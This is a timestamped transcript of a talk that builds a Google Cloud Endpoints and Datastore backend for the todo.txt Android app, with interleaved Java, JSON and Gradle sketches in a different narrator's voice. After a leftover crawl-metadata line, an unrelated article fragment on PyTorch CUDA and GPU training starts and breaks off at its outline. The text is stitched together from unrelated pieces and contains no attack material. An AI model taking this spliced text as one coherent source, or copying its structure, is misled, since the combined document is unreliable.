- CUDA, tensors, parallelization, asynchronous operations, synchronous operations, streams
- Using CUDA with Pytorch
- Availability and additional information about CUDA, working with multiple CUDA devices, training a PyTorch model on a GPU, parallelizing the training process, running a PyTorch model on GPU
- Best tools to manage PyTorch models
- Tensorboard, cnvrg.io, Azure Machine Learning
- Best practices, tips, and strategies
Let’s jump in.
What is PyTorch, and what makes it so popular?
To start with, let’s talk about deep learning frameworks. As you might know, there are many DL frameworks out there:
- TensorFlow (TF)
- Keras
- PyTorch
- MxNet
- And others
Each of these frameworks offers users the building blocks for designing, training, and validating deep neural networks through a high-level programming interface.
Every data scientist has their own favorite Deep Learning framework. PyTorch has become a very popular framework, and for good reason.
PyTorch is a Python open-source DL framework that has two key features. Firstly, it is really good at tensor computation that can be accelerated using GPUs. Secondly, PyTorch allows you to build deep neural networks on a tape-based autograd system and has a dynamic computation graph.
Moreover, PyTorch is a well-known, tested, and popular deep learning framework among data scientists. It is commonly used both in Kaggle competitions and by various data science teams across the globe.
To install PyTorch simply use a pip command or refer to the official installation documentation:
pip install torch torchvision
It is worth mentioning that PyTorch is probably one of the easiest DL frameworks to get started with and master. It provides awesome documentation that is well structured and full of valuable tutorials and simple examples. You should definitely check it out if you are interested in using PyTorch, or you are just getting started.
Furthermore, PyTorch includes an easy-to-use API that supports Python, C++, and Java. Also, PyTorch has no problems integrating with the Python data science stack which will help you unveil its true potential.
Overall, PyTorch is a really convenient to use tool with limitless potential. If you haven’t used it yet, you must try. I guarantee, it is worth it. Still, in this article the focus is on PyTorch and CUDA’s interaction, so, let’s proceed with a deep dive.
PyTorch CUDA Support
CUDA is a parallel computing platform and programming model developed by Nvidia that focuses on general computing on GPUs. CUDA speeds up various computations helping developers unlock the GPUs full potential.
CUDA is a really useful tool for data scientists. It is used to perform computationally intense operations, for example, matrix multiplications way faster by parallelizing tasks across GPU cores.
However, it is worth mentioning that CUDA is not the only tool for GPU computation acceleration. There is also OpenCL, an open standard maintained by the Khronos Group, with implementations from Nvidia and other vendors. Still, CUDA is simply more popular due to its high-level structure, so if you are not sure which tool to use you should probably start with CUDA.
As for PyTorch, it natively supports CUDA. CUDA can be accessed in the torch.cuda library.
As you might know, neural networks work with tensors. A tensor is a multi-dimensional matrix containing elements of a single data type. In general, torch.cuda adds support for CUDA tensor types that implement the same functions as CPU tensors but utilize GPUs for computation. If you want to find out more about tensor types, please refer to the torch.Tensor documentation.
Considering the key capabilities that PyTorch’s CUDA library brings, there are three topics that we need to discuss:
- Tensors
- Parallelization
- Streams
Tensors
As mentioned above, CUDA brings its own tensor types with it. The key feature is that the CUDA library keeps track of which GPU device you are using.
CUDA automatically assigns any tensors that you create to the device that you are using (in most cases this device is GPUs). Moreover, after your tensor is assigned to a particular device you can perform any operation with it. These operations will be run on the device and the result will be assigned to the device as well.
This approach is really convenient, as you may perform many operations at the same time by simply switching CUDA devices. Moreover, CUDA does not support cross-device computations, which means you will not accidentally mix devices and lose track of experiments if you spread your operations across different devices.
Parallelization
CUDA’s parallelization concept is based on asynchronous operations as all GPU operations are asynchronous by default. Such an approach helps to perform a larger number of computations in parallel.
For the user, this process is almost invisible. PyTorch does everything automatically by copying data required for computation to various devices and synchronizing them. Moreover, all operations are performed in the order of queuing as if every operation was executed synchronously.
Still, there is a major disadvantage. For example, if you face an error on a GPU it might be a tough challenge to identify the operation that caused the error. In such a case, it is better for you to use the synchronous approach. CUDA allows this as well.
By using synchronous execution you will see the errors when they occur and be able to identify and fix them. To use synchronous execution please refer to the official documentation considering this problem.
Streams
CUDA stream is a linear sequence of execution that is assigned to a specific device. In general, every device has its own default stream so you do not need to create a new one.
Operations are serialized in the order of creation inside each stream. However, operations from different streams can be executed at the same time in any relative order unless you are using any special synchronization methods.
It is worth mentioning that PyTorch automatically synchronizes data if you have your default stream set to some new stream. Still, it does not work with non-default streams. In such a case, it is your responsibility to ensure proper synchronization.
Using CUDA with PyTorch: a step-by-step example
Now you understand the basics of PyTorch and CUDA and their key capabilities. You also understand PyTorch's CUDA support. Now let's step away from the theory and discuss more practical applications of PyTorch and CUDA. This section will cover how to use CUDA with PyTorch. I will try to be as precise as possible and cover every aspect you might need when working on your ML project.
What will be covered in this section:
- How to check the availability of CUDA?
- How to get additional information about the CUDA device?
- How to work on multiple CUDA devices?
- How to train a PyTorch model on a GPU?
- How to parallelize the training process?
- How to run a PyTorch model on a GPU?
Also, I have prepared a notebook that can be accessed via Google Colab to support this article. In this notebook, I am using the MobileNet V3 architecture to solve a classification problem on the CIFAR10 dataset.
You will find everything mentioned in this article below in the notebook. Do not forget to turn on the GPU as the notebook will crash without it. Please feel free to experiment and play around as there is no better way to master something than practice.
Let’s jump in.
Check availability of CUDA
To start with, you must check if your system supports CUDA. You can do that by using a simple command.
torch.cuda.is_available()
This command returns a bool value, either True or False. If you get True, everything is okay and you can proceed; if you get False, something is wrong and your system does not support CUDA. Please make sure that you have your GPU turned on (in case you are using Google Colab) or search the web to diagnose any other issues.
It is a crucial moment as this command will check if your GPU is available and the required NVIDIA drivers and CUDA libraries are properly installed. Please do not ignore this step as it might save you a lot of time and unnecessary frustrations.
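A common companion idiom is to pick a device once based on that check and pass it around explicitly, so the same script runs on both GPU and CPU machines. A minimal sketch:

```python
import torch

# Pick the device once based on the availability check, then pass it around
# explicitly; the same script then runs on both GPU and CPU machines.
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')

x = torch.zeros(2, 3, device=device)  # tensor created directly on that device
print(device.type, x.device.type)
```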
Additional information about CUDA device
If you passed the previous step, it is time to figure out some useful information about the CUDA device you are currently on. The methods mentioned below are quite useful, so please keep them in mind when working with CUDA, as they might help you figure out the problem if something goes wrong. It is worth mentioning that these methods are available only on GPUs, as that is exactly what CUDA works with.
Let’s start with simple information about the CUDA device like an id and name. There are simple methods for finding both of them.
torch.cuda.current_device() # returns the ID of your current device
torch.cuda.get_device_name(ID of the device) # returns the name of the device
Also, you may find some useful information about the memory usage of the device.
torch.cuda.memory_allocated(ID of the device) # returns the current GPU memory usage by tensors in bytes for a given device
torch.cuda.memory_reserved(ID of the device) # returns the current GPU memory managed by the caching allocator in bytes for a given device (in previous PyTorch versions the command was torch.cuda.memory_cached)
Moreover, you can actually release all unoccupied cached memory currently held by the caching allocator so that those can be used in other GPU applications using a simple method.
torch.cuda.empty_cache()
Still, you must remember that this command will not free the occupied GPU memory, so the amount of GPU memory available for PyTorch will not be increased. Just keep this in mind.
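For example, the memory queries above can be wrapped in a small helper that degrades gracefully on CPU-only machines (the helper name is my own, not part of PyTorch):

```python
import torch

def report_gpu_memory(device_id=0):
    """Current allocated/reserved bytes for one CUDA device.

    Returns zeros on CPU-only machines; the helper name is illustrative,
    not part of PyTorch itself.
    """
    if not torch.cuda.is_available():
        return {'allocated': 0, 'reserved': 0}
    return {
        'allocated': torch.cuda.memory_allocated(device_id),
        'reserved': torch.cuda.memory_reserved(device_id),
    }

print(report_gpu_memory())
```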
Working with multiple CUDA devices
All right, let’s assume that you have multiple devices that are CUDA compatible. Of course, you can use only one of them but, if you have the ability, you should probably use all of them. Firstly, using all of them will increase performance.. Secondly, CUDA allows you to do it quite seamlessly.
In general, there are two basic concepts that you might want to follow if you want to maximize the potential of multiple GPUs:
- Simply use each GPU (device) for its own purpose (task or application) – the basic but quite effective concept
- Use each GPU to do a part of a project – for example, in the ensemble case where you need to train a variety of models
Overall, the workflow is quite simple. Firstly, you need to figure out the ID of a specific CUDA device that you have using the methods mentioned above. Secondly, you just need to allocate tensors to a specific device or change the default device.
If you're considering allocating tensors to various devices, please keep in mind that in general, all tensors are allocated to your default (current) device, which has ID equal to zero (0). Still, you can easily allocate a tensor to any CUDA device if you specify the ID of a destination device.
cuda1 = torch.device('cuda:1') # where 1 is the ID of the specific device
tensor = torch.Tensor([0., 0.], device=cuda1)
tensor = torch.Tensor([0., 0.]).to(cuda1)
tensor = torch.Tensor([0., 0.]).cuda(cuda1)
As you can see, there are three ways to allocate a PyTorch tensor to a specific device. Feel free to use any of them, as all of them are legit. As mentioned above, you cannot perform cross-GPU operations, so please use tensors from one device. Also, be aware that the result of a tensor operation will be allocated on the same device as its operands.
Moving on to changing the default CUDA device. You can easily do this with a simple method.
torch.cuda.set_device(1) #where 1 is the ID of device
By doing that you will switch the default CUDA device, and from that point on, every tensor will be allocated on the new device.
Also, if you have multiple GPUs and for some reason do not want to use some of them you can make a specific GPU invisible using an environment variable.
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "1,2,3" # where 1, 2, 3 are the IDs of CUDA devices that will be visible (in this example the device with ID 0 is invisible)
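Beyond hiding devices with environment variables, torch.cuda also provides a context manager that switches the current device only within a block of code. A sketch, guarded so it is a no-op on machines with fewer than two GPUs:

```python
import torch

# torch.cuda.device is a context manager that switches the current device only
# inside the with-block, instead of changing it globally with set_device.
device_count = torch.cuda.device_count()
if device_count >= 2:
    with torch.cuda.device(1):
        y = torch.ones(4).cuda()  # lands on device 1 while inside the block
        print(y.device)           # cuda:1
print(device_count)
```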
Training a PyTorch model on a GPU
Now that you know how to work with tensors and CUDA devices (GPUs), it is finally time to talk about training a PyTorch neural network on GPU. To tell the truth, it’s actually not so difficult. If you have checked the availability of the CUDA device, you will not face any problem in this step.
You might want to reference the “MobileNetV3 (small)” and “Training preparation” sections of the notebook I have prepared for you as it covers pretty much everything you need to know.
So, to train a PyTorch model on a GPU you need to:
1. Code your own neural network architecture or use a pre-built one from torchvision.models
2. Allocate your model to the GPU
net = MobileNetV3() # net is a variable containing our model
net = net.cuda()    # we allocate our model to the GPU
3. Start training
Yes, it is that simple. Fortunately, PyTorch does not require anything complicated to carry out this task, unlike some other frameworks.
From now on your model will be stored on the GPU and the training process will be executed there as well. However, please do not forget that you must allocate your data to the GPU as well, or you will face errors. You can do that as described in the "Working with multiple CUDA devices" section.
Still, if you want to make sure that your model is truly on the GPU you must check whether its parameters are on GPU or not.
next(net.parameters()).is_cuda #returns a bool value, True - your model is truly on GPU, False - it is not
If you are interested in the general training process for PyTorch models please refer to the “Training” section of my notebook as I have manually coded the training process there.
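As an illustration of those steps, here is a minimal, device-agnostic training loop on toy data. The tiny Sequential model stands in for MobileNetV3, and the shapes and hyperparameters are made up for the sketch, not taken from the notebook:

```python
import torch
from torch import nn, optim

# Pick the device once; the same loop runs on GPU or CPU.
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')

net = nn.Sequential(nn.Linear(10, 16), nn.ReLU(), nn.Linear(16, 2)).to(device)
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=0.1)

inputs = torch.randn(32, 10, device=device)         # data must live on the
labels = torch.randint(0, 2, (32,), device=device)  # same device as the model

for _ in range(5):
    optimizer.zero_grad()
    loss = criterion(net(inputs), labels)
    loss.backward()
    optimizer.step()

print(loss.item())
```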
Parallelizing the training process
As for the parallelization, in PyTorch, it can be easily applied to your model using torch.nn.DataParallel.
The general idea is splitting the input across the specified CUDA devices by dividing the batch into several parts. In the forward pass, the model is replicated on each device, and each replica handles a portion of the input. During the backward pass, gradients from each replica are summed into the original model.
Still, in terms of code, it is very simple. Below you can find a piece of code where I form a list of GPUs to make them CUDA visible devices, allocate my model to GPU and use DataParallel to make my training process parallelized.
GPU = 0, 1
gpu_list = ''
multi_gpus = False
if isinstance(GPU, int):
    gpu_list = str(GPU)
else:
    multi_gpus = True
    for i, gpu_id in enumerate(GPU):
        gpu_list += str(gpu_id)
        if i != len(GPU) - 1:
            gpu_list += ','
os.environ['CUDA_VISIBLE_DEVICES'] = gpu_list

net = net.cuda()
if multi_gpus:
    net = DataParallel(net, device_ids = gpu_list)
Running a PyTorch model on GPU
So, after you finished training you might want to test your model on some test dataset. That is the point where you need to figure out how to run your model on a GPU.
Luckily we already know everything we need to do that. You can find a simple example of loading a PyTorch model from the checkpoint and allocating it to a CUDA device.
cuda = torch.cuda.is_available()
net = MobileNetV3()
checkpoint = torch.load('path/to/checkpoint/')
net.load_state_dict(checkpoint['net_state_dict'])
if cuda:
    net = net.cuda()
net.eval()
result = net(image) # remember that image must be allocated to the GPU as well
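When running inference it is also common to wrap the forward pass in torch.no_grad() so that no autograd state is kept. A minimal sketch with a stand-in model (nn.Linear replaces the real checkpointed network, and the shapes are invented for illustration):

```python
import torch
from torch import nn

device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
net = nn.Linear(4, 2).to(device)  # stand-in for the real checkpointed network
net.eval()

image = torch.randn(1, 4, device=device)  # input must live on the same device as the model
with torch.no_grad():                     # skip autograd bookkeeping during inference
    result = net(image)
print(result.shape)                       # torch.Size([1, 2])
```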
Best tools to manage PyTorch models
In the previous section, we have discussed how to use CUDA with PyTorch and now you should not face obstacles when using CUDA for your PyTorch project. Still, it is considered common sense to have a specific tool to back you up.
Sometimes when you dive into a project, you may quickly realize that you’re drowning in an ocean of Python scripts, data, algorithms, functions, updates, and so on. At some point, you just lose track of your experiments, and can’t even say which script or update led to the best result. That is why it is very convenient to have a tool that will help you with experiment tracking and model management.
There are many MLOps tools. There are even articles and lists that cover this topic. Still, I want to mention some of them here so you are able to feel the variety and decide if you need a tool at all.
I am sure you are all familiar with the first tool. It is Tensorboard.
In my experience it is the most popular tracking and visualization tool out there. It can be used with PyTorch but it has some pitfalls. For sure, it is an easy-to-start tool but its tracking functionality seems limited. There are tools that provide way more capabilities.
Still, it has nice and complete documentation, so you might give it a shot.
One way to make Tensorboard even easier to use is with cnvrg.io. cnvrg.io has Tensorboard embedded into the platform to help track and manage your projects without having to switch between platforms. In addition, cnvrg.io is natively integrated with PyTorch, which allows data scientists to easily parallelize computations across nodes. Not only that, but cnvrg.io is natively integrated with Nvidia's NGC containers, so data scientists can instantly launch PyTorch in one click with optimized performance.
Overall, it is a very powerful tool with awesome and easy to navigate through documentation. Moreover, it has valuable tutorials for using PyTorch, so you should have no problem setting things up. Please refer to the official documentation if you want to learn more about the platform as there is too much to talk about.
That is why cnvrg is a good fit as the project management tool for any DL project.
The third tool I want to mention here is Azure Machine Learning. It is a cloud-based machine learning lifecycle platform developed by Microsoft.
To tell the truth, it is a really popular tool that is used by some large IT companies. It is really good at versioning and experiment tracking and has well-structured documentation with loads of simple examples.
However, due to its end-to-end focus and lack of valuable advanced tutorials, the entry threshold is rather high. You really need to learn the tool before you can use it effectively. That is why you should use Azure Machine Learning only if you are ready to spend some time studying the instrument.
Of course, it is impossible to cover all the variety of different MLOps tools. I have mentioned only those that I frequently use myself. So, please feel free to investigate the topic, and you will eventually find the tool that suits you and your project best.
Best practices, tips, and strategies
Throughout this article I mentioned plenty of useful tips and techniques, so let’s summarize them into a list:
- Pick PyTorch as a DL framework if you want a tool that is effective, fast, and convenient to use
- Always train on GPUs
- If you are working in Kaggle kernels or Google Colab, do not forget that they support GPU usage but it is turned off by default. Please enable the GPU accelerator there
- It is super easy and effective to use CUDA when working with a PyTorch model
- Do not forget about CUDA key capabilities such as tensors creation and usage, parallelizations, and streams
- Remember that it’s always good practice to keep track of GPU memory usage when using CUDA as it will help you avoid some unfortunate mistakes
- Do not forget to check PyTorch’s official documentation as it has plenty of simple examples and valuable tutorials that must cover the majority of your questions
- It’s recommended to use more than one GPU for better performance (if you have the option)
- Do not forget to parallelize the training process if possible
- Do not underestimate the power of community and forums. In many cases, if you face an error you can simply Google it and find the answer
- It is always better to use some MLOps tool to help you with model management, experiment tracking, resource management and DevOps automation
- You must keep an eye on PyTorch and CUDA updates as some things might change
Final Thoughts
Hopefully this tutorial will help you succeed and use your GPUs more effectively in your next Deep Learning project.
To summarize, we started with some theoretical information about using PyTorch and CUDA and went through a step-by-step guide on how to use CUDA when working on a PyTorch model. Also, we covered some PyTorch model management tools. Lastly, we talked about some tips you may find useful when working with CUDA.
If you enjoyed this post, a great next step would be to start building your own Deep Learning project with all the relevant tools. Check out tools like:
- PyTorch as a DL framework,
- CUDA as GPU accelerator,
- cnvrg for model management and experiment tracking
For extra support, you can access the Notebook for further code and documentation.
Thanks for reading, and happy training!
Resources
-
-
-
-
-
-
- | https://cnvrg.io/pytorch-cuda/ | CC-MAIN-2021-43 | refinedweb | 3,823 | 61.67 |
This page is a snapshot from the LWG issues list, see the Library Active Issues List for more information and the meaning of C++20 status.
Section: 26.2 [ranges.syn] Status: C++20 Submitter: United States/Great Britain Opened: 2019-11-08 Last modified: 2021-02-25
Priority: 1
View all other issues in [ranges.syn].
View all issues with C++20 status.
Discussion:
Addresses US 273/GB 274
US 273:all_view is not a view like the others. For the other view types, foo_view{args...} is a valid way to construct an instance of type foo_view. However, all_view is just an alias to the type of view::all(arg), which could be one of several different types. all_view feels like the wrong name. Proposed change: Suggest renaming all_view to all_t and moving it into the views:: namespace.
GB 274:Add range_size_t. LEWG asked that range_size_t be removed from P1035, as they were doing a good job of being neutral w.r.t whether or not size-types were signed or unsigned at the time. Now that we've got a policy on what size-types are, and that P1522 and P1523 have been adopted, it makes sense for there to be a range_size_t. Proposed change: Add to [ranges.syn]:
template<range R> using range_difference_t = iter_difference_t<iterator_t<R>>;
template<sized_range R> using range_size_t = decltype(ranges::size(declval<R&>()));
David Olsen: The proposed wording has been approved by LEWG and LWG in Belfast.
[2019-11-23 Issue Prioritization]
Priority to 1 after reflector discussion.
[2020-02-10 Move to Immediate Monday afternoon in Prague]
Proposed resolution:
This wording is relative to N4835.
Change 26.2 [ranges.syn], header <ranges> synopsis, as indicated:
#include <initializer_list>
#include <iterator>

namespace std::ranges {
  […]
  // 26.4.2 [range.range], ranges
  template<class T>
    concept range = see below;
  […]
  template<range R>
    using range_difference_t = iter_difference_t<iterator_t<R>>;
  template<sized_range R>
    using range_size_t = decltype(ranges::size(declval<R&>()));
  template<range R>
    using range_value_t = iter_value_t<iterator_t<R>>;
  […]
  // 26.7.5.2 [range.ref.view], all view
  namespace views {
    inline constexpr unspecified all = unspecified;

    template<viewable_range R>
      using all_t = decltype(all(declval<R>()));
  }
  […]
}
Globally replace all occurrences of all_view with views::all_t. There are 36 occurrences in addition to the definition in the <ranges> synopsis that was changed above. | https://cplusplus.github.io/LWG/issue3335 | CC-MAIN-2022-21 | refinedweb | 361 | 56.66 |
libmtp - util.c
#include <sys/time.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/stat.h>
#include <fcntl.h>
#include "libmtp.h"
#include "util.h"

Functions

void data_dump (FILE *f, void *buf, uint32_t n)
void data_dump_ascii (FILE *f, void *buf, uint32_t n, uint32_t dump_boundry)
This file contains generic utility functions such as can be used for debugging, for example.

Copyright (C) 2005-2007 Linus Walleij <[email protected]

void data_dump (FILE * f, void * buf, uint32_t n)

    This dumps out a number of bytes to a textual, hexadecimal dump.

    Parameters:
        f    the file to dump to (e.g. stdout or stderr)
        buf  a pointer to the buffer containing the bytes to be dumped out in hex
        n    the number of bytes to dump from this buffer

void data_dump_ascii (FILE * f, void * buf, uint32_t n, uint32_t dump_boundry)

    This dumps out a number of bytes to a textual, hexadecimal dump, and also prints
    out the string ASCII representation for each line of bytes. It will also print the
    memory address offset from a certain boundry.

    Parameters:
        f    the file to dump to (e.g. stdout or stderr)
        buf  a pointer to the buffer containing the bytes to be dumped out in hex
        n    the number of bytes to dump from this buffer
        dump_boundry  the address offset to start at (usually 0)
Generated automatically by Doxygen for libmtp from the source code. | http://huge-man-linux.net/man3/mtp_util.c.html | CC-MAIN-2018-05 | refinedweb | 234 | 75.4 |
#include <LiquidCrystal.h>

//LCD display pinout - YM2004A & OV1604A
//VSS LCD pin 1  - Connect to ground
//VDD LCD pin 2  - Connect to +5V
//V0  LCD pin 3  - Connect to potentiometer
//RS  LCD pin 4  - Arduino pin D07
//RW  LCD pin 5  - Connect to ground
//EN  LCD pin 6  - Arduino pin D08
//DB4 LCD pin 11 - Arduino pin D09
//DB5 LCD pin 12 - Arduino pin D10
//DB6 LCD pin 13 - Arduino pin D11
//DB7 LCD pin 14 - Arduino pin D12
//ELA LCD pin 15 - Arduino pin D13
//ELK LCD pin 16 - Connect to ground

//LiquidCrystal lcd(7, NULL, 8, 9, 10, 11, 12);
LiquidCrystal lcd(7, 8, 9, 10, 11, 12);

int screen_backlight = 13; //pin D13 will control the backlight
float voltage_battery = 0; //pin A0
float voltage_divider = (98700+9790)/9790; //((R1+R2)/R2)*voltage on A0-pin

void setup() {
  pinMode(screen_backlight, OUTPUT); //LCD Setup
  digitalWrite(screen_backlight, HIGH); // turn backlight on. Replace 'HIGH' with 'LOW' to turn it off.
  lcd.begin(20,4); // columns, rows. use 16,2 for a 16x2 LCD, etc.
  lcd.clear(); // start with a blank screen
  lcd.setCursor(0,0); //LCD text row 1
  lcd.print("Ui V");
}

void read_voltage() {
  //Voltage input, U must be lower than 5V, HW-divided then SW-multiplied
  voltage_battery = analogRead(A0)*voltage_divider*5/1023;
}

void screen_print() {
  //Printing battery voltage level on LCD screen
  lcd.setCursor(3,0);
  if(voltage_battery<10) {
    lcd.print(" ");
  }
  lcd.print(voltage_battery);
}

void loop() {
  read_voltage();
  screen_print();
}
ADC reading 1000 + 2000 = 3000 / 1000 = 3
check the chip's ADC AREF pin, say it's 4.89 volt
you can compensate for that in code, so your math is 1000 + 2000 = 3000 / 1000 = 3 * 5 = (V1) 15
So an ADC reading of (V2) 5 volts = 15 volts
What are the exact voltages measured at the battery, the Arduino +5V pin and the analog input pin when it's connected up?
Your voltage divider adds up to about a factor 11, not a factor 10.I guess that's what you are tripping over.
float voltage_divider = (98700+9790)/9790; //((R1+R2)/R2)*voltage on A0-pin
float voltage_divider = (98700.0+9790.0)/9790.0; //((R1+R2)/R2)*voltage on A0-pin
@be80beWhy the extra 1K resistor before the A0-pin?
On 10 January 2011 11:26, Nick Coghlan [email protected] wrote:
On Mon, Jan 10, 2011 at 11:11 AM, Ron Adam [email protected] wrote:.
Yep - 99.99% of python code will never care if this is ever fixed. However, the fact that we've started using acceleration modules and pseudo-packages in the standard library means that "things should just work" is being broken subtly in the stuff we're shipping ourselves (either by creating pickling problems, as in unittest, or misleading introspection results, as in functools and datetime).
And if we're going to fix it at all, we may as well fix it right :)
I certainly don't object to fixing this, and neither do I object to adding a new class / module / function attribute to achieve it.
However... is there anything else that this fixes? (Are there more examples "in the wild" where this would help?)
The unittest problem with pickling is real but likely to only affect a very, very small number of users. The introspection problem (getsource) for functools and datetime isn't a real problem because the source code isn't available. If in fact getsource now points to the pure Python version even in the cases where the C versions are being used then "fixing" this seems like a step backwards...
Python 3.2:
>>> import inspect
>>> from datetime import date
>>> inspect.getsource(date)
'class date:\n """Concrete date type.\n\n ...'
Python 3.1:
>>> import inspect
>>> from datetime import date
>>> inspect.getsource(date)
Traceback (most recent call last):
  ...
IOError: source code not available
With your changes in place would Python 3.3 revert to the 3.1 behaviour here? How is this an advantage?
What I'm really asking is, is the cure (and the accompanying implementation effort and additional complexity to the Python object model) worse than the disease...
All the best,
Michael Foord
Cheers, Nick.
-- Nick Coghlan | [email protected] | Brisbane, Australia
Python-ideas mailing list [email protected]
--
May you do good and not evil May you find forgiveness for yourself and forgive others May you share freely, never taking more than you give. -- the sqlite blessing | https://mail.python.org/archives/list/[email protected]/message/5DG4ZYHGEPHSURSXDR36KFEROYI464OH/ | CC-MAIN-2021-04 | refinedweb | 361 | 66.03 |
Template literals are literals delimited with backtick (`) characters, allowing embedded expressions and multi-line strings. A tagged template calls a function (the tag) with an array of the literal's text segments, followed by arguments with the values of any substitutions, which is useful for DSLs.
Template literals are sometimes informally called template strings, but they aren't string literals and can't be used everywhere a string literal can be used. Also, a tagged template literal may not result in a string; it's up to the tag function what it creates (if anything).
Syntax
// Untagged, these create strings:
`string text`

`string text line 1
 string text line 2`

`string text ${expression} string text`

// Tagged, this calls the function "example" with the template as the
// first argument and substitution values as subsequent arguments:
example`string text ${expression} string text`
Description

To escape a backtick in a template literal, put a backslash (\) before the backtick.

`\`` === '`' // --> true

Multi-line strings

Any newline characters inserted in the source are part of the template literal. Using normal strings, you would have to use newline escapes and string concatenation to get multi-line strings.
Using template literals, you can do the same like this:
console.log(`string text line 1
string text line 2`);
// "string text line 1
// string text line 2"
Expression interpolation
In order to embed expressions within normal strings, you would use the following syntax:
let a = 5;
let b = 10;
console.log('Fifteen is ' + (a + b) + ' and\nnot ' + (2 * a + b) + '.');
// "Fifteen is 15 and
// not 20."
Now, with template literals, you are able to make use of the syntactic sugar, making substitutions like this more readable:
let a = 5;
let b = 10;
console.log(`Fifteen is ${a + b} and
not ${2 * a + b}.`);
// "Fifteen is 15 and
// not 20."
Nesting templates
In certain cases, nesting a template is the easiest (and perhaps more readable) way to have configurable strings. Within a backticked template, it is simple to allow inner backticks by using them inside a placeholder ${ } within the template. For instance, if condition a is true, then return this templated literal.
In ES5, the same result requires chaining string concatenation with nested ternary expressions, which quickly becomes hard to read; with ES2015 template literals, the inner template can simply be nested inside a placeholder of the outer one.
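For instance (a sketch; the isLargeScreen helper and the item object here are assumptions):

```javascript
const item = { isCollapsed: true };
const isLargeScreen = () => false;

// ES5 style: string concatenation with nested ternaries
let classes = 'header';
classes += (isLargeScreen() ? '' :
  (item.isCollapsed ? ' icon-expander' : ' icon-collapser'));

// ES2015: the inner template nests inside the outer placeholder
const classes2 = `header ${ isLargeScreen() ? '' :
  `icon-${item.isCollapsed ? 'expander' : 'collapser'}` }`;

console.log(classes);  // "header icon-expander"
console.log(classes2); // "header icon-expander"
```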
Tagged templates

A more advanced form of template literals are tagged templates. Tags allow you to parse template literals with a function: the first argument of the tag function contains an array of string values, and the remaining arguments are related to the expressions. The tag function can then perform whatever operations on these arguments you wish, and return the manipulated string. (Alternatively, it can return something completely different, as described in one of the following examples.)
The name of the function used for the tag can be whatever you want.
let person = 'Mike';
let age = 28;

function myTag(strings, personExp, ageExp) {
  let str0 = strings[0]; // "That "
  let str1 = strings[1]; // " is a "
  let str2 = strings[2]; // "."

  let ageStr;
  if (ageExp > 99) {
    ageStr = 'centenarian';
  } else {
    ageStr = 'youngster';
  }

  // We can even return a string built using a template literal
  return `${str0}${personExp}${str1}${ageStr}${str2}`;
}

let output = myTag`That ${ person } is a ${ age }.`;

console.log(output);
// That Mike is a youngster.
Tag functions don't even need to return a string!
function template(strings, ...keys) {
  return (function(...values) {
    let dict = values[values.length - 1] || {};
    let result = [strings[0]];
    keys.forEach(function(key, i) {
      let value = Number.isInteger(key) ? values[key] : dict[key];
      result.push(value, strings[i + 1]);
    });
    return result.join('');
  });
}

let t1Closure = template`${0}${1}${0}!`;
//let t1Closure = template(["","","","!"], 0, 1, 0);
t1Closure('Y', 'A');                      // "YAY!"

let t2Closure = template`${0} ${'foo'}!`;
//let t2Closure = template([""," ","!"], 0, "foo");
t2Closure('Hello', {foo: 'World'});       // "Hello World!"

let t3Closure = template`I'm ${'name'}. I'm almost ${'age'} years old.`;
//let t3Closure = template(["I'm ", ". I'm almost ", " years old."], "name", "age");
t3Closure('foo', {name: 'MDN', age: 30}); // "I'm MDN. I'm almost 30 years old."
t3Closure({name: 'MDN', age: 30});        // "I'm MDN. I'm almost 30 years old."
Raw strings
The special raw property, available on the first argument to the tag function, allows you to access the raw strings as they were entered, without processing escape sequences. In addition, the String.raw() method exists to create raw strings, just like the default template function and string concatenation would create.

let str = String.raw`Hi\n${2+3}!`;
// "Hi\\n5!"

str.length;
// 6

Array.from(str).join(',');
// "H,i,\,n,5,!"
Tagged templates are not subject to the usual restrictions on escape sequences. Illegal escape sequences (such as \u followed by something other than a valid Unicode escape, \x without valid hexadecimal digits, or octal-style sequences starting with \0 and followed by one or more digits, for example \0o251) are permitted in tagged templates; the cooked value becomes undefined while the raw string remains accessible. The same is not true of untagged template literals, where an illegal escape sequence is a syntax error:

let bad = `bad escape sequence: \unicode`;
Specifications
Browser compatibility
Why should .NET developers be interested in Jamstack?
This post was contributed by our friends at Kentico Kontent.
If you’re a .NET or C# developer, the Jamstack approach to building websites might have fallen off your radar over the years. With the development of the Jamstack ecosystem, now might be the right time for you to build on a Jamstack architecture and utilize all your well-deserved .NET skills.
What marmalade cake are you talking about?
One of the key concepts of Jamstack is pre-rendering. In Jamstack sites the entire frontend is prepared at build time, and the resulting static output is served from a content delivery network (CDN).
As a Jamstack developer, you don’t want to write all the logic for transforming your project into static files. Instead, you want to use some tools for this pre-rendering. These tools are doing a lot of fancy stuff for you—usually they allow you to apply templates, handle all the bundling and minification, and provide you with a rich ecosystem of plugins for specific use cases like data fetching from CMS, site map generating, or optimizing images. These tools are called static site generators. But let’s talk .NET now, where a generator called Statiq is quickly becoming a popular option.
U jokin’? Why would I want to build a static site in the 2020s?
Glad you asked! These are not static sites full of GIFs and WordArt from the '90s, though I love those retro-feeling ones like my university programming teacher's site. Browsers, JavaScript, and APIs have all advanced in capabilities since then. These days you can implement dynamic functionality like authentication, payments, or search even on static sites.
So, how to jam on .NET?
With Statiq! Statiq is a static site generator for .NET. It brings the first-class experience of both Visual Studio and VS Code – including Intellisense and debugging – to the Jamstack world. In combination with the .NET platform and many built-in features like pipelines, modules, preview server, and shortcodes, it is a great entry ticket for .NET developers and teams into Jamstack.
The Statiq project contains a general-purpose static generation framework called Statiq Framework and a convention-based static site generator called Statiq Web that’s built on top of it. From now on, we will be referring to Statiq.Web when talking about Statiq.
The basics of Statiq
For a start, let’s explain some key concepts and specifics of Statiq. I believe these are essential to having a solid base when starting with this static site generator.
Documents
A document is the primary unit of information in Statiq. It consists of content and metadata. Imagine that Statiq is like a document database that can process these documents. To be more precise, these documents are immutable: when a document is processed, a new instance of the document is returned. Documents are manipulated by modules.
Modules
A module is a component that performs a specific action with documents. A module takes documents as input, does an operation based on those documents (possibly transforming them), and outputs documents as a result of whatever operation was performed. Modules are typically chained in a sequence called a pipeline.
Pipelines
